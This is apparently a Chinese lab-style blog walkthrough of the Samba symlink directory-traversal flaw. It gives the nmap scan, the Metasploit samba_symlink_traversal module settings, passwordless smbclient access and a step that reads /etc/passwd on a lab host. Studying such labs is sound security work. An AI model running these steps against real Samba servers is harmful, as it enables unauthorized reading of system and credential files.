sysmlink漏洞
sysmlink 目录遍历漏洞
利用sysmlink漏洞读取目标主机的passwd文件内容
原理:Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。
过程:
使用nmap -sV ip
扫描主机,确认开放445
,139
端口且安装了samba
服务,版本为3
命令行输入search samba
,搜索samba的相关工具和载荷。
终端中输入use auxiliary/admin/smb/samba_symlink_traversal
,启用漏洞利用模块
输入info
,"yes"
表示必须要填写的信息
输入set RHOST 192.168.1.3
和set SMBSHARE tmp
,设置主机ip地址和SAM可写文件
输入exploit开始攻击
新建终端,输入smbclient //192.168.1.3/tmp
,直接回车,无密码
输入cd rootfs
,进入rootfs目录,输入ls,列出目录
输入more /etc/passwd
此实验完成
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 0xchang's Blog!